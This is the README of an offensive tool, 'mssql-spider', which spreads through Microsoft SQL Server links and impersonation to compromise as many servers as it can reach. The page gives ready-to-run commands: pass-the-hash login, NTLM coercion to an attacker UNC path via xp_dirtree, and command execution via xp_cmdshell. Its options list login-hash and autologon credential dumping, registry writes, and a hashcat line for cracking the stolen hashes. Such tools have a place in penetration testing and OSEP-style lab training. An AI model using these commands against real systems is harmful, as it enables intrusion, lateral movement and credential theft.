An improved impacket-mssqclient that exploits user impersonation and follows linked instances to discover and compromise as many Microsoft SQL Servers as it can reach.
Big thanks to the developers of fortra/impacket#1397, SQLRecon and PowerUpSQL on which this project is based.
Warning: Although this project was successfully tested in the lab and solves the OSEP Challenge 2 automatically, it is still kinda work in progress.
a) With pipx.
pipx install git+
b) With pip.
pip install --user git+
Authenticate as local user and enumerate recursively.
mssql-spider -u jdoe -p passw0rd db01.corp.local
Authenticate as domain user via Pass the Hash and coerce NTLM authentication from all reachable hosts trough xp_dirtree
This does not require privileged access.
mssql-spider -d corp.local -u jdoe -H :b9f917853e3dbf6e6831ecce60725930 --coerce-dirtree '\\attacker.corp.local\test' ./mssql-servers.txt
Authenticate via Kerberos and execute a command trough xp_cmdshell
on all hosts where you can obtain sysadmin privileges.
mssql-spider -k -n -x 'whoami /groups' db01.corp.local:50123
Detailed help:
positional arguments:
-h, --help show this help message and exit
--depth UINT default: 10
--threads UINT default: based on CPU cores
--timeout SECONDS default: 5
--debug write verbose log to stderr
-d DOMAIN, --domain DOMAIN implies -w
-p PASSWORD, --password PASSWORD
-n, --no-pass disable password prompt, default: false
-H [LMHASH]:NTHASH, --hashes [LMHASH]:NTHASH authenticate via pass the hash
-a HEXKEY, --aes-key HEXKEY authenticate with Kerberos key in hex, implies -k
-w, --windows-auth use windows instead of local authentication, default: false
-k, --kerberos authenticate via Kerberos, implies -w, default: false
-K ADDRESS, --dc-ip ADDRESS FQDN or IP address of a domain controller, default: value of -d
-D NAME, --database NAME
-q SQL, --query SQL execute SQL statement, unprivileged
--sysinfo retrieve database and OS version, unprivileged
-c UNCPATH, --coerce-dirtree UNCPATH coerce NTLM trough xp_dirtree(), unprivileged
--coerce-fileexist UNCPATH coerce NTLM trough xp_fileexist(), unprivileged
--coerce-openrowset UNCPATH coerce NTLM trough openrowset(), privileged
--fs-read REMOTE read file trough openrowset(), privileged
--fs-write LOCAL REMOTE write file trough OLE automation, privileged
-x COMMAND, --exec-cmdshell COMMAND execute command trough xp_cmdshell(), privileged
--exec-ole COMMAND execute blind command trough OLE automation, privileged
--exec-job sql|cmd|powershell|jscript|vbscript COMMAND execute blind command trough agent job, privileged, experimental!
--reg-read HIVE KEY NAME read registry value, privileged, experimental!
--reg-write HIVE KEY NAME TYPE VALUE write registry value, privileged, experimental!
--reg-delete HIVE KEY NAME delete registry value, privileged, experimental!
--dump-hashes extract hashes of database logins, privileged
--dump-jobs extract source code of agent jobs, privileged
--dump-autologon extract autologon credentials from registry, privileged
Dumped database password hashes can be cracked with hashcat.
hashcat -O -w 3 -a 0 -m 1731 --username ./hashes.txt ./rockyou.txt